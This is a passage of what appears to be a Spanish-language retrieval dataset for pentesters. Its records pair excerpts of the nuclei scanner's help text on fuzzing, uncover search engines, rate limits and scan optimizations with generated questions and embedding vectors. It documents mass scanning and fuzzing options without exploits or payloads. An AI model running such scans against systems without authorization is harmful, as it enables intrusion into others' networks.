-0.05975, -0.00974, 0.02303, -0.04061, -0.01597, -0.02506, -0.03219, -0.02467, -0.07259, 0.13606, -0.04825, -0.00898, -0.06367, -0.01843, -0.01454, 0.13919, 0.02562, 0.03204, -0.05692, 0.02459, -0.05879, 0.03415, 0.06309, -0.01075, -0.06116, 0.05393, -0.00752, 0.1257, 0.07424, -0.10109, 0.0669, -0.04416, 0.04789, -0.08338, 0.03634, -0.06153, 0.06269, -0.01512, -0.05979, 0.01522, 0.00823, 0.01286, -0.00285, 0.04403, -0.00666, 0.00756, -0.03854, -0.03731, -0.0696, -0.00709, 0.02385, -0.00303, 0.01489, -0.06357, 0.00896, -0.01903, -0.0348, 0.01634, 0.03662, -0.0262, 0.00216, 0.02285, -0.0407, -0.03821, 0.02606, 0.04886, 0.03841, -0.00169, 0.08171, 0.02533, -0.0696, -0.01949, 0.02421, 0.05995, 0.01416, -0.04563, 0.01714, 0.00213, 0.02545, 0.06616, 0.013, 0.04958, -0.05178, -0.03173, 0.0276, 0.02995, 0.06025, 0.00773, 0.00092, 0.02427, 0.01339, -0.02267, 0.0035, 0.01983, 0.04831, 0.01956, 0.05739, 0.01946, -0.03515, -0.01583, -0.01199, -0.00977, -0.03999, 0.00252, -0.00163, 0.00233, 0.01525, 0.02565, 0.01315, -0.05619, 0.04103, -0.0148]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "indexar": "con quΓ© herramienta puedo simular un servidor de fuzzing live?", "v": [-0.02731, 0.05429, -0.24434, -0.11823, -0.00856, -0.09774, -0.14399, -0.10421, 0.08956, -0.08721, -0.14428, -0.01676, 0.00253, -0.00427, 0.02041, 0.02637, 0.10126, -0.09303, -0.04606, 0.0615, 0.03596, 0.00505, -0.08756, -0.10705, -0.11093, 0.04116, 0.08159, -0.04113, -0.13733, -0.10433, 0.04909, 0.00917, 0.04974, -0.04862, 0.00958, -0.08418, -0.00238, 0.11967, -0.05739, 0.07422, 0.0478, 0.07117, -0.03695, 0.01502, 0.04099, -0.02279, -0.03458, -0.14514, 0.05216, -0.00298, -0.05847, -0.10347, -0.09104, -0.02294, -0.00668, -0.12061, 0.09627, -0.27044, 0.17214, -0.09526, -0.06657, -0.01794, -0.01742, -0.05506, 0.01859, 0.0241, 0.05713, -0.08501, -0.04351, 0.06666, -0.05815, 0.00131, 0.00219, -0.0577, 0.00781, 0.01017, -0.00758, 0.01662, 0.02987, 0.03569, 0.08188, 0.00323, -0.04715, 0.10113, -0.0378, -0.06791, 0.05093, -0.02379, 0.07974, -0.05913, -0.00113, 0.11355, -0.04129, 0.11797, 0.06621, -0.02632, 0.17454, -0.09083, 0.02656, -0.07173, 0.13848, 0.04221, -0.14765, 0.0424, 0.01199, 0.0539, 0.08292, -0.10087, -0.01369, -0.01126, 0.06635, 0.01508, -0.05661, -0.00661, 0.02446, 0.01206, -0.02577, -0.03873, 0.10168, -0.00461, 0.03955, 0.00993, 0.00663, -0.01002, -0.00233, -0.00655, 0.02045, 0.02728, -0.02806, -0.0572, 0.00813, -0.02028, -0.07334, -0.0113, 0.06299, -0.02348, 0.06072, -0.07105, -0.01798, -0.06833, 0.02586, 0.0675, -0.04865, -0.10941, 0.0599, -0.02004, 0.01412, -0.05465, -0.05285, 0.02889, 0.01737, -0.05438, -0.01423, 0.04395, -0.09834, -0.05747, 0.01182, -0.03096, -0.08126, 0.03267, 0.01884, -0.01234, 0.04453, 0.02292, -0.01469, -0.03062, 0.01951, 0.02201, 0.01794, 0.06709, 0.01393, 0.01099, 0.06664, -0.01786, 0.03759, -0.0116, -0.09544, -0.04706, -0.00987, -0.09576, -0.015, 0.03908, -0.03773, -0.0207, -0.02939, -0.07704, -0.02226, 0.01897, -0.00167, 0.06951, 0.04783, 0.0506, -0.02819, 0.0415, 0.04427, 0.03544, 0.03708, -0.07382, 0.00635, -0.04536, -0.02912, -0.05593, -0.00898, -0.07103, 0.05478, 0.08029, -0.06544, 0.03948, 0.00501, 0.04458, -0.01757, -0.03132, 0.05213, -0.0263, 0.03304, -0.01868, 0.08004, -0.05212, 0.0028, -0.07292, 0.01228, 0.01376, 0.02779, -0.00276, -0.04487, 0.04541, 0.00321, 0.02475, 0.04988, -0.02308, -0.01783, -0.01623, 0.03102, 0.00481, 0.01494, -0.03887, 0.07563, 0.00049, -0.08059, -0.08271, 0.00055, 0.1104, -8e-05, -0.06286, 0.01602, -0.03063, -0.05705, -0.06201, -0.02878, -0.05858, -0.02498, -0.01722, 0.0672, -0.04391, 0.00394, -0.01807]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UNCOVER:\n -uc, -uncover enable uncover engine\n -uq, -uncover-query string[] uncover search query\n -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan)\n -uf, -uncover-field string uncover fields to return (ip,port,host) (default \"ip:port\")\n -ul, -uncover-limit int uncover results to return (default 100)\n -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)", "indexar": "con quΓ© puedo hacer una bΓΊsqueda inversa de dominios a IPs?", "v": [0.07662, 0.00867, -0.06592, 0.04598, 0.05399, -0.06782, 0.07043, -0.091, -0.17367, -0.0164, 0.12771, -0.12266, -0.00111, -0.13516, -0.08378, 0.01255, 0.21236, 0.0045, -0.0028, -0.15914, -0.09617, 0.00909, -0.13146, -0.0287, 0.00126, -0.02827, -0.1356, 0.01606, -0.03747, -0.04121, -0.19746, -0.10744, -0.0203, 0.04174, -0.21011, -0.15075, 0.0249, 0.13373, 0.10074, 0.03428, 0.05394, 0.06747, -0.12669, 0.01909, -0.09775, -0.03127, -0.00635, -0.13547, 0.01361, -0.1731, -0.18687, -0.11413, -0.05629, -0.07708, -0.01937, -0.01146, 0.11221, -0.09408, -0.02863, -0.08211, -0.10592, 0.01197, -0.07765, 0.03337, 0.02801, -0.11135, -0.04305, 0.06975, 0.03906, -0.01081, 0.01827, -0.00987, -0.06534, 0.03785, 0.10135, -0.00691, 0.09381, -0.08253, 0.06458, -0.01746, -0.01433, 0.03368, -0.13931, -0.03989, -0.01815, -0.11655, -0.10494, -0.14802, 0.07496, -0.06872, 0.02019, 0.05022, -0.06601, -0.04634, -0.02721, -0.01109, 0.03756, 0.03736, -0.11805, -0.00308, -0.0089, 0.10925, -0.10081, 0.10306, 0.10624, 0.07227, 0.02717, -0.01345, 0.03574, 0.03132, -0.03609, -0.02705, -0.00778, -0.03709, 0.0182, 0.05737, -0.06811, 0.00359, 0.0295, 0.03789, -0.02756, -0.01986, 0.01973, 0.01708, 0.04355, 0.02041, 0.02186, -0.00408, -0.00925, -0.05602, 0.06488, -0.01975, -0.0102, -0.0376, 0.03169, 0.05126, 0.05717, -0.00987, -0.02466, 0.03252, 0.0236, -0.04054, -0.01308, -0.01259, 0.03652, -0.09161, 0.09796, -0.08927, -0.03283, -0.07259, -0.05598, 0.02395, -0.017, 0.04221, -0.01998, 0.04343, -0.08274, -0.0629, -0.0317, -0.00158, -0.02404, 0.04883, -0.00293, -0.01145, 0.0366, 0.04134, -0.01841, 0.01249, 0.00097, 0.0178, -0.08697, 0.01255, -0.05444, -0.01227, -0.00271, 0.05824, -0.00223, 0.06423, -0.01594, -0.03473, -0.01223, -0.05811, -0.01851, 0.00351, 0.02475, 0.05964, 0.06867, 0.01612, 0.01677, -0.00638, 0.07064, 0.00242, -0.0313, 0.04929, -0.01124, -0.01219, 0.01078, -0.00752, -0.02147, -0.03448, 0.00989, -0.04393, 0.00659, 0.00456, -0.04721, -0.02324, -0.03532, 0.04764, 0.0316, -0.07088, -0.05252, 0.0005, 0.02479, 0.01381, -0.099, 0.03197, -0.03281, 0.0128, -0.05664, -0.02641, -0.01434, 0.00364, -0.07051, -0.01608, 0.04061, 0.00802, 0.00408, -0.01697, -0.03213, 0.02067, -0.01255, 0.03152, -0.02434, -0.00343, 0.03132, -0.00808, -0.04163, -0.02887, 0.0399, 0.05502, -0.02244, -0.00687, 0.02608, -0.02058, -0.00713, -0.03499, -0.05073, 0.02144, -0.02704, -0.00542, -0.02872, 0.01062, -0.01635, 0.00337, -0.00717, -0.0203]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "UNCOVER:\n -uc, -uncover enable uncover engine\n -uq, -uncover-query string[] uncover search query\n -ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google,odin,binaryedge) (default shodan)\n -uf, -uncover-field string uncover fields to return (ip,port,host) (default \"ip:port\")\n -ul, -uncover-limit int uncover results to return (default 100)\n -ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)", "indexar": "quΓ© herramienta sirve para descubrir subdominios y servidores?", "v": [-0.14154, -0.02054, -0.19422, -0.16643, 0.05623, -0.14567, -0.02788, -0.13059, 0.06647, -0.09366, -0.08044, -0.06583, 0.00177, -0.18294, 0.06459, 0.00201, 0.21489, -0.11416, -0.02912, 0.07157, 0.05403, 0.01981, -0.07826, -0.05085, -0.07615, -0.01747, 0.03767, -0.04206, -0.11988, 0.07302, 0.00867, -0.04786, 0.03583, -0.07547, -0.11575, -0.07763, -0.04569, 0.07401, -0.08668, 0.11195, 0.06855, 0.01782, -0.0728, 0.04877, -0.06049, -0.00793, -0.09186, -0.01955, 0.01508, 0.03332, -0.14126, -0.12107, -0.02423, -0.03438, -0.09219, -0.11781, 0.06534, -0.12276, 0.06084, -0.0529, -0.16454, -0.00214, -0.05821, -0.03187, 0.07645, -0.1056, -0.02207, -0.02274, -0.05634, 0.01829, -0.08334, -0.02054, 0.05971, -0.03476, -0.05538, 0.02956, -0.00638, 0.02523, 0.07038, 0.03619, 0.06528, 0.0939, -0.07722, 0.03938, -0.10335, -0.10566, 0.05064, -0.01832, 0.00669, -0.06162, 0.01199, 0.10762, -0.01057, 0.04382, 0.00111, 0.03074, 0.10058, -0.0989, -0.02148, 0.00031, 0.17308, -0.02789, -0.06738, 0.07612, -0.04498, 0.08431, -0.03912, -0.0832, -0.03961, -0.03578, 0.10255, -0.04215, -0.03822, 0.05989, -0.05943, -0.01446, -0.03179, 0.00625, 0.00646, -0.00207, 0.01466, 0.07245, -0.00508, -0.01434, -0.01609, -0.03883, 0.03398, 0.01019, 0.04741, -0.0987, 0.05033, -0.03918, -0.0982, 0.08227, -0.03171, -0.06637, 0.14141, -0.08019, -0.02717, -0.04281, 0.00164, 0.03566, -0.0385, -0.04509, 0.04868, -0.00408, 0.14252, -0.04011, -0.02489, -0.01656, -0.01188, -0.09514, -0.04301, -0.00059, -0.0667, -0.04671, -0.01491, -0.00485, -0.17594, 0.05542, -0.01059, -0.04326, 0.03982, 0.0406, -0.00623, -0.08444, -0.02308, 0.02215, 0.04541, 0.06766, 0.03034, 0.01876, 0.07132, -0.07605, -0.00728, -0.05572, -0.08924, 0.02647, 0.04759, -0.00812, 0.02391, 0.03452, -0.0435, 0.0197, -0.06719, -0.04225, -0.0063, -0.07205, -0.03639, 0.02121, 0.01261, -0.00847, -0.01524, -0.03554, 0.03443, -0.00481, -0.00405, -0.00637, -0.00782, -0.01349, -0.0208, -0.02164, -0.03267, -0.0264, 0.01578, 0.01004, -0.07269, 0.02191, 0.01118, 0.03211, 0.00625, -0.01083, 0.05561, -0.03566, -0.00678, 0.01025, -0.00502, 0.03929, -0.06081, -0.02189, 0.015, -0.02353, 0.03865, 0.00141, 0.00573, 0.06018, 0.04057, 0.0033, 0.02386, 0.0239, 0.03484, -0.02187, -0.00494, 0.05731, -0.03992, -0.07602, 0.05264, -0.01775, -0.02318, -0.03169, -0.0141, 0.05569, 0.03029, -0.02712, -0.03399, -0.0757, 0.02235, -0.05146, -0.07579, 0.00846, 0.01858, 0.01157, 0.02585, -0.00928, 0.00385, 0.00134]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "indexar": "quΓ© herramienta sirve para hacer escaneos de portabilidad masivos en paralelo?", "v": [0.0467, -0.04313, -0.29366, -0.05222, -0.02845, -0.14646, -0.02228, -0.16294, -0.04145, -0.02619, -0.06979, 0.04695, 0.0523, -0.04209, 0.07234, 0.09471, 0.05447, -0.08847, -0.04636, 0.04147, -0.02665, -0.04428, -0.13265, -0.03037, -0.05246, 0.00108, 0.02156, 0.03842, -0.2346, 0.10192, -0.04742, 0.11859, 0.02049, -0.13035, -0.03731, -0.09285, -0.00906, 0.03501, 0.04286, 0.01063, -0.0085, 0.0972, -0.15069, -0.08847, -0.04877, -0.10065, -0.07269, 0.06158, -0.03962, 0.175, -0.12008, -0.17238, -0.1038, 0.05408, 0.05678, -0.17785, 0.14758, -0.11292, -0.01699, -0.10718, -0.1231, 0.04777, -0.02436, -0.05668, -0.04713, -0.09108, -0.0308, -0.01803, -0.02499, 0.04821, -0.10178, 0.0798, 0.0812, 0.01055, -0.07639, -0.05945, 0.01766, 0.03574, -0.00459, 0.07048, 0.05765, -0.02646, -0.08689, -0.03281, -0.09201, -0.0171, 0.0241, -0.01393, 0.00924, -0.01107, 0.00702, 0.09521, 0.04913, 3e-05, 0.05015, 0.02674, 0.00238, -0.02355, -0.01878, -0.01987, 0.11541, -0.09106, -0.07132, 0.00578, -0.01668, 0.05799, -0.06002, -0.04653, -0.08043, 0.03585, 0.0941, 0.06903, 0.00392, -0.0136, -0.06931, 0.13406, -0.01277, 0.01867, -0.01758, 0.03351, 0.01221, 0.04888, -0.03197, -0.04245, 0.0279, 0.01248, 0.02122, 0.06988, -0.01181, -0.02984, 0.02343, -0.05921, -0.0315, 0.03992, -0.03394, -0.04734, 0.02012, -0.17217, 0.01256, -0.05978, 0.01913, 0.02084, -0.05488, -0.08244, -0.0365, 0.00873, 0.0059, 0.00973, -0.02686, -0.03791, 0.04081, -0.01422, -0.06997, -0.02016, -0.04935, -0.06388, -0.00312, 0.04872, -0.16445, 0.06232, -0.05576, -0.0161, 0.04627, 0.02965, -0.00177, -0.05964, 0.04208, -0.01361, -0.00095, 0.02263, 0.05705, 0.05301, -0.00881, -0.01724, 0.04028, 0.01316, -0.03695, -0.01401, -0.05516, -0.02615, -0.01334, 0.01958, -0.01896, 0.00911, 0.08113, -0.00788, 0.02912, -0.02943, 0.01742, 0.0886, -0.01403, 0.00638, 0.01548, -0.06827, 0.01298, -0.02606, 0.03385, -0.05254, 0.04914, 0.0193, -0.03601, 0.00191, 0.02605, -0.0612, 0.0679, 0.05401, -0.03679, -0.03365, 0.00306, 0.04938, 0.03422, 0.02411, 0.02996, 0.00245, 0.02428, 0.01227, -0.02179, 0.04429, 0.01824, -0.0016, 0.01709, -0.0393, 0.02069, 0.03823, -0.00225, 0.0807, -0.01074, -0.02037, -0.01132, -0.01016, 0.05394, -0.07185, -0.01471, 0.01831, 0.02275, -0.08679, -0.01113, 0.03958, -0.00109, -0.03137, -0.01759, 0.01012, -0.00415, 0.0159, -0.0535, -0.06067, 0.0204, -0.00015, -0.03409, -0.05286, -0.07154, -0.03753, 0.00214, -0.00708, 0.02544, 0.00415]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "indexar": "con quΓ© puedo analizar mΓΊltiples hosts simultΓ‘neamente usando scripts personalizados?", "v": [0.21941, 0.21292, -0.14212, -0.09678, -0.02759, -0.06049, -0.06652, -0.12275, -0.0735, -0.09615, -0.01911, 0.01119, 0.03159, -0.08082, 0.05388, 0.02771, 0.00696, -0.09618, 0.05048, 0.07337, 0.0981, -0.09469, -0.09716, -0.03438, -0.07864, -0.0325, 0.09249, 0.04955, -0.11882, -0.05335, -0.0516, 0.07222, -0.0187, -0.09263, -0.04294, -0.03761, -0.10066, 0.10213, -0.00923, 0.05262, 0.0594, 0.04663, -0.16496, -0.03546, 0.03659, 0.00781, -0.06741, -0.0238, -0.04011, -0.08591, 0.0094, -0.07255, -0.10627, 0.00339, 0.04633, -0.02977, 0.09414, -0.19691, 0.01884, 0.03874, -0.01775, 0.01585, 0.0601, 0.03715, 0.09116, -0.04012, 0.02928, -0.06652, -0.0504, 0.01788, -0.07313, 0.03487, -0.00023, 0.02433, 0.11167, 0.13696, -0.04331, -0.0012, 0.10649, 0.07998, -0.037, -0.07353, -0.03471, 0.08858, -0.05541, -0.09146, -0.10523, -0.02164, -0.05494, -0.0507, 0.1005, -0.02088, 0.01404, 0.00049, 0.01561, -0.04639, 0.15457, -0.0156, 0.04269, 0.07855, 0.02777, 0.01863, -0.08975, 0.14236, -0.01693, 0.11978, 0.03315, -0.05357, 0.02453, -0.03525, -0.00974, 0.04383, -0.05373, -0.05145, 0.01755, -0.04185, -0.04695, -0.0828, 0.02564, -0.04584, -0.08788, 0.01285, -0.02243, -0.04721, 0.03637, -0.05889, 0.01023, 0.0327, 0.02069, 0.04823, -0.0796, 0.03698, -0.11237, -0.07093, -0.08386, 0.13065, 0.07216, -0.05095, -0.0758, -0.04132, 0.03536, 0.05111, 0.03317, 0.01596, 0.07756, -0.01968, -0.065, -0.10613, -0.08456, 0.00224, 0.02456, 0.02023, 0.00065, -0.00369, -0.04453, -0.126, -0.0418, -0.08893, -0.09541, 0.06289, -0.01349, -0.01723, -0.01943, 0.05382, 0.06528, -0.03738, -0.01621, -0.01147, 0.08206, 0.05394, -0.02421, 0.05876, 0.00602, -0.04609, 0.02508, -0.02373, 0.01579, -0.07367, -0.06739, -0.08649, -0.03051, -0.01238, -0.01811, -0.01944, -0.0729, -0.03018, 0.00241, 0.04059, 0.04162, 0.00199, 0.01949, 0.07418, -0.00572, -0.03932, 0.04783, -0.03604, -0.02413, -0.07107, -0.00437, -0.0273, -0.04315, 0.08667, 0.0213, -0.03997, 0.07987, 0.06666, -0.10336, 0.04426, 0.02895, -0.01435, -0.01056, -0.03503, 0.08191, -0.03423, -0.03144, 0.01706, -0.01387, -0.01675, 0.02604, -0.02745, 0.0425, -0.01167, 0.04489, -0.03242, -0.01592, -0.00648, 0.06877, 0.01644, 0.05637, 0.07759, -0.01557, 0.05517, -0.04931, 0.01857, 0.03637, -0.02219, 0.01133, -0.01173, -0.03422, -0.03273, 0.02831, 0.07626, -0.06598, -0.02953, -0.0324, -0.05575, -0.06765, -0.00699, 0.03589, -0.03449, -0.02949, 0.03348, 0.00786, -0.04466, 0.01348, -0.03562]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "RATE-LIMIT:\n -rl, -rate-limit int maximum number of requests to send per second (default 150)\n -rld, -rate-limit-duration value maximum number of requests to send per second (default 1s)\n -rlm, -rate-limit-minute int maximum number of requests to send per minute (DEPRECATED)\n -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)\n -c, -concurrency int maximum number of templates to be executed in parallel (default 25)\n -hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)\n -headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)\n -jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)\n -pc, -payload-concurrency int max payload concurrency for each template (default 25)\n -prc, -probe-concurrency int http probe concurrency with httpx (default 50)", "indexar": "hay alguna alternativa libre que me permita ejecutar cientos de probas de seguridad al mismo tiempo?", "v": [0.05856, 0.19371, -0.16348, -0.01598, -0.08051, -0.02132, 0.00246, -0.07584, -0.14567, -0.12764, -0.0967, 0.00509, 0.09521, 0.0595, 0.1251, -0.03426, 0.11149, 0.03031, 0.07469, -0.0503, 0.02062, -0.14022, -0.07988, -0.10448, -0.00251, -0.07538, -0.03627, 0.01377, -0.12721, -0.11773, -0.02491, 0.06067, 0.11769, -0.0359, -0.02977, 0.07892, 0.0732, 0.0418, 0.11937, 0.02143, 0.05819, -0.03741, -0.00592, -0.00436, 0.09989, -0.07388, -0.07709, 0.0399, -0.05942, -0.09948, -0.06023, -0.04357, -0.03963, -0.09207, 0.04444, -0.02639, 0.10539, -0.00593, -0.11433, -0.11589, -0.05757, 0.00918, 0.13609, -0.0158, 0.0962, 0.05376, -0.00248, -0.00234, -0.0527, 0.10213, 0.00513, -0.01288, -0.02946, 0.03149, -0.11643, -0.18991, -0.04408, -0.02879, -0.00513, 0.07927, -0.01573, -0.05356, -0.03942, 0.03344, -0.07734, -0.06592, -0.00038, -0.08805, -0.01405, 0.11369, 0.09806, 0.039, 0.04345, 0.12056, -0.00228, -0.06025, 0.04353, 0.10782, -0.02601, 0.02282, 0.07104, -0.05067, -0.03271, -0.0185, 0.01733, 0.01893, -0.0777, 0.05919, 0.04822, -0.03784, -0.04654, 0.0523, -0.03436, -0.06722, -0.06101, 0.00269, -0.00869, -0.07407, 0.00102, -0.03335, -0.01832, -0.04871, -0.10009, -0.00448, 0.03508, 0.0012, 0.01691, 0.00828, -0.04827, 0.01803, 0.02974, -0.07251, -0.03316, -0.09407, -0.10212, 0.0752, -0.00108, -0.10068, 0.01682, -0.08068, 0.01787, 0.04281, -0.00901, -0.00684, 0.0374, 0.06079, -0.0634, -0.07316, -0.04746, 0.01685, -0.06438, 0.01925, -0.02568, 0.13889, -0.07224, 0.01839, -0.02864, -0.03033, 0.03918, 0.05431, 0.05126, 0.03923, -0.02766, -0.02861, 0.01091, 0.01915, 0.04105, -0.04363, -0.04075, 0.01496, 0.01586, 0.0745, 0.04269, -0.09293, 0.0637, -0.07001, -0.03478, -0.05164, -0.01751, -0.03739, 0.04451, 0.02929, -0.10245, -0.02793, 0.07322, -0.10738, 0.03919, 0.09437, 0.01626, 0.04584, -0.0179, 0.00409, -0.09655, -0.02552, -0.03018, 0.03066, 0.087, -0.0922, -0.05546, 0.01465, -0.06537, -0.02626, -0.0033, -0.02816, -0.00644, 0.02608, -0.02269, 0.08816, -0.02112, -0.00201, 0.09255, 0.05679, 0.07347, -0.05386, -0.09423, -0.03092, 0.07715, 0.01414, -0.04255, 0.01831, 0.02383, 0.03409, 0.05803, 0.02198, -0.02119, 0.00396, 0.03632, 0.03173, 0.03828, 0.01511, 0.01915, -0.01293, -0.06524, -0.01814, 0.04931, -0.04547, 0.02706, -0.0295, 0.01152, -0.06025, 0.0237, 0.11728, -0.0449, -0.03555, -0.086, -0.01076, -0.09513, -0.01763, -0.02696, -0.09292, -0.02566, 0.02519, -0.02902, -0.01777, 0.02309, -0.03908]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OPTIMIZATIONS:\n -timeout int time to wait in seconds before timeout (default 10)\n -retries int number of times to retry a failed request (default 1)\n -ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)\n -mhe, -max-host-error int max errors for a host before skipping from scan (default 30)\n -te, -track-error string[] adds given error to max-host-error watchlist (standard, file)\n -nmhe, -no-mhe disable skipping host from scan based on errors\n -project use a project folder to avoid sending same request multiple times\n -project-path string set a specific project path (default \"/tmp\")\n -spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)\n -stream stream mode - start elaborating without sorting the input\n -ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)\n -irt, -input-read-timeout value timeout on input read (default 3m0s)\n -nh, -no-httpx disable httpx probing for non-url input\n -no-stdin disable stdin processing", "indexar": "que programa sirve para hacer pruebas de penetraciΓ³n HTTP sin enviar las mismas peticiones varias veces", "v": [0.05886, 0.12231, -0.21095, -0.17858, 0.06221, -0.09574, -0.0115, -0.04179, 0.09245, -0.04557, -0.05239, 0.08255, 0.03834, -0.14769, 0.06365, 0.01713, 0.09954, -0.0498, 0.1744, -0.04928, 0.0155, 0.02412, -0.0535, -0.10033, -0.13472, 0.05544, 0.02737, 0.01369, -0.04197, -0.11264, 0.02371, -0.08139, -0.02321, 0.08814, -0.08049, -0.02331, -0.05716, 0.03203, 0.05186, 0.14179, 0.04496, 0.06586, -0.03996, -0.00387, -0.02249, -0.0502, 0.02368, -0.05815, -0.00685, -0.1275, 0.01854, 0.01162, -0.15536, 0.02046, -0.11251, 0.0487, 0.08357, -0.22585, -0.05159, -0.10341, 0.01227, -0.07912, 0.13477, -0.02495, 0.08792, -0.0556, 0.03503, 0.06518, -0.06866, 0.07973, -0.01761, 0.03836, 0.00347, -0.11697, -0.03312, -0.01922, -0.06054, -0.06163, -0.0583, 0.01955, 0.03383, 0.03378, -0.02972, 0.02171, -0.12691, -0.00079, -0.0107, -0.06146, 0.08588, -0.08492, 0.09364, 0.1415, 0.0081, 0.07857, 0.05963, -0.10042, 0.0634, -0.03923, 0.02769, 0.04509, 0.05479, -0.0461, -0.0556, 0.02454, -0.01975, 0.06524, 0.07186, -0.03763, 0.03645, -0.0185, 0.03944, -0.00092, -0.13135, -0.03609, -0.05997, -0.00301, -0.08118, -0.05198, -0.00653, -0.0649, -0.12371, -0.0464, -0.08066, 0.01507, -0.00875, -0.04867, 0.01584, 0.00376, -0.02282, 0.08592, 0.0789, 0.04412, -0.08186, 0.00609, -0.02762, -0.05312, 0.01736, -0.0702, 0.01309, -0.01116, 0.01048, 0.10048, -0.00153, -0.03156, 0.00995, 0.06847, -0.0192, -0.04724, -0.04859, 0.00283, -0.03061, -0.01976, -0.04193, 0.07207, -0.07095, -0.04462, 0.05819, -0.0841, -0.02917, 0.11421, 0.01749, 0.02319, 0.00965, 0.00168, 0.07053, 0.0562, -0.12081, -0.00267, 0.05751, 0.00631, -0.02899, 0.09119, -0.0561, -0.13132, -0.02921, -0.01676, -0.02406, -0.06339, 0.00176, -0.03465, -0.02416, 0.02166, -0.0058, 0.01609, 0.06705, -0.02651, 0.01369, 0.01376, 0.07562, 0.03526, 0.07513, 0.0288, -0.09816, 0.06765, 0.06578, 0.01823, -0.06491, 0.02862, 0.02564, -0.02222, -0.06141, -0.08359, 0.05668, -0.05634, -0.01365, 0.06036, -0.01238, -0.02208, 0.00349, 0.03067, 0.01205, -0.01623, 0.04113, -0.01117, -0.01983, -0.0367, 0.05624, 0.06024, -0.04294, 0.04449, -0.02938, -0.00272, 0.01216, 0.02851, -0.01096, 0.02287, 0.04819, -0.01868, 0.0406, 0.02554, 0.00985, -0.01672, -0.07427, -0.02892, 0.07705, 0.00387, -0.04806, -0.01785, -0.00966, -0.08063, -4e-05, 0.04232, -0.03002, 0.02259, 0.02226, -0.02464, -0.07541, -0.02748, 0.01235, 0.00101, -0.0703, 0.02502, 0.00551, -0.08161, 0.03953, -0.00647]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "OPTIMIZATIONS:\n -timeout int time to wait in seconds before timeout (default 10)\n -retries int number of times to retry a failed request (default 1)\n -ldp, -leave-default-ports leave default HTTP/HTTPS ports 